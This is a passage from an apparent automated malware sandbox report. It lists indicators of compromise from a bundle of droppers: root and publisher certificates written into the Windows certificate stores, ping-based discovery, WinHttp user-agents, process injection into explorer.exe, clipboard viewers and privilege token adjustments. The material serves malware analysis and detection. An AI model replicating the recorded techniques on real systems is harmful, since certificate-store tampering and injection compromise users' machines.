0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Rugomaevoki.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	Sidyshywyly.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

8612 PING.EXE

pid	process
8612	PING.EXE

Script User-Agent 64 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	220	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	553	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1410	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1940	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	52	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	54	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	287	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	311	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17240	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17878	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14846	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16024	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	551	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	603	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	630	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14827	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3698	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3727	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	548	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	586	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	611	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	612	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1488	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	602	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4271	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17917	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17932	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	225	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18327	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	55	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	294	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18024	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3248	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15220	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18603	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	216	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	558	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	613	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1506	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	43	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	288	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	241	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	374	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	617	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4005	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4035	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	606	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18208	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	40	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	289	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1724	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14833	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15239	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.tmpSetup.exeprolab.tmpRugomaevoki.exe

pid	process
644	Setup.tmp
644	Setup.tmp
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
1364	Setup.exe
2688	prolab.tmp
2688	prolab.tmp
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe
1352	Rugomaevoki.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2396
Suspicious behavior: LoadsDriver 5 IoCs

Processes:

setup.exeapp.exesetup.exe

pid process

6528 setup.exe
8128 app.exe
616
616
9816 setup.exe

pid	process
6528	setup.exe
8128	app.exe
616
616
9816	setup.exe

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

privacytools5.exeprivacytools5.exeexplorer.exeexplorer.exeexplorer.exeMicrosoftEdgeCP.exeprivacytools5.exe

pid	process
15656	privacytools5.exe
5364	privacytools5.exe
2396
2396
2396
2396
2396
2396
2396
2396
6540	explorer.exe
6540	explorer.exe
2396
2396
6540	explorer.exe
6540	explorer.exe
2396
2396
8804	explorer.exe
8804	explorer.exe
8804	explorer.exe
8804	explorer.exe
8804	explorer.exe
8804	explorer.exe
6540	explorer.exe
6540	explorer.exe
2396
2396
2396
2396
8100	explorer.exe
8100	explorer.exe
8100	explorer.exe
8100	explorer.exe
8100	explorer.exe
8100	explorer.exe
2396
2396
8100	explorer.exe
8100	explorer.exe
8804	explorer.exe
6540	explorer.exe
8804	explorer.exe
6540	explorer.exe
8960	MicrosoftEdgeCP.exe
8960	MicrosoftEdgeCP.exe
8960	MicrosoftEdgeCP.exe
8960	MicrosoftEdgeCP.exe
8804	explorer.exe
8804	explorer.exe
8100	explorer.exe
8100	explorer.exe
6540	explorer.exe
6540	explorer.exe
8660	privacytools5.exe
8960	MicrosoftEdgeCP.exe
8960	MicrosoftEdgeCP.exe
8100	explorer.exe
8100	explorer.exe
6540	explorer.exe
6540	explorer.exe
8804	explorer.exe
8804	explorer.exe
6540	explorer.exe

Suspicious behavior: SetClipboardViewer 4 IoCs

Processes:

4536431.492565045.284111450.456765460.74

pid process

16076 4536431.49
7932 2565045.28
7488 4111450.45
4132 6765460.74

pid	process
16076	4536431.49
7932	2565045.28
7488	4111450.45
4132	6765460.74

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

HGT.exetaskkill.exeRugomaevoki.exemd7_7dfj.exetaskkill.exeHookSetp.exe8445151.92powershell.exeMultitimerFour.exemultitimer.exeMicrosoftEdge.exemultitimer.exe7za.exeMicrosoftEdgeCP.exe

description	pid	process
Token: SeDebugPrivilege	2520	HGT.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	1352	Rugomaevoki.exe
Token: SeManageVolumePrivilege	3636	md7_7dfj.exe
Token: SeDebugPrivilege	9748	taskkill.exe
Token: SeManageVolumePrivilege	3636	md7_7dfj.exe
Token: SeManageVolumePrivilege	3636	md7_7dfj.exe
Token: SeDebugPrivilege	14884	HookSetp.exe
Token: SeDebugPrivilege	15416	8445151.92
Token: SeDebugPrivilege	16016	powershell.exe
Token: SeDebugPrivilege	16188	MultitimerFour.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeDebugPrivilege	16376	multitimer.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeTakeOwnershipPrivilege	2396
Token: SeRestorePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeDebugPrivilege	16852	MicrosoftEdge.exe
Token: SeDebugPrivilege	16852	MicrosoftEdge.exe
Token: SeDebugPrivilege	16852	MicrosoftEdge.exe
Token: SeDebugPrivilege	16852	MicrosoftEdge.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeDebugPrivilege	17252	multitimer.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeRestorePrivilege	4276	7za.exe
Token: 35	4276	7za.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeSecurityPrivilege	4276	7za.exe
Token: SeShutdownPrivilege	2396
Token: SeCreatePagefilePrivilege	2396
Token: SeSecurityPrivilege	4276	7za.exe
Token: SeDebugPrivilege	4268	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4268	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4268	MicrosoftEdgeCP.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpprolab.tmpSetup3310.tmpIBInstaller_97039.tmpvict.tmpvpn.tmp

pid	process
3664	Setup3310.tmp
644	Setup.tmp
208	Delta.tmp
1576	PictureLAb.tmp
2688	prolab.tmp
5184	Setup3310.tmp
5368	IBInstaller_97039.tmp
5316	vict.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

